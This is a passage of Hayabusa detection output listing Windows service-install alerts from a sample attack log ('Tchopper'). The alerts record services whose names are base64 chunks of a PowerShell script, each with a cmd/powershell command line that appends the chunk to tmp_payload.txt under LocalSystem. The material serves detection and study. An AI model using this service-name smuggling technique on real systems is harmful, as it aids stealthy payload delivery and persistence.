ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:40.933 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:42.386 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:42.386 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:42.386 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:43.824 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:43.824 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:43.824 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:45.277 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:45.277 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:45.277 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:46.746 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:46.746 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:46.746 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:48.200 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:48.200 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:48.200 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:49.641 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:49.641 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:49.641 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:51.086 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:51.086 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:51.086 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:52.536 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:52.536 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:52.536 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:54.010 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:54.010 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:54.010 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:55.527 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:55.527 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:55.527 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:57.001 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:57.001 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:57.001 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:58.464 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:58.464 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:58.464 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 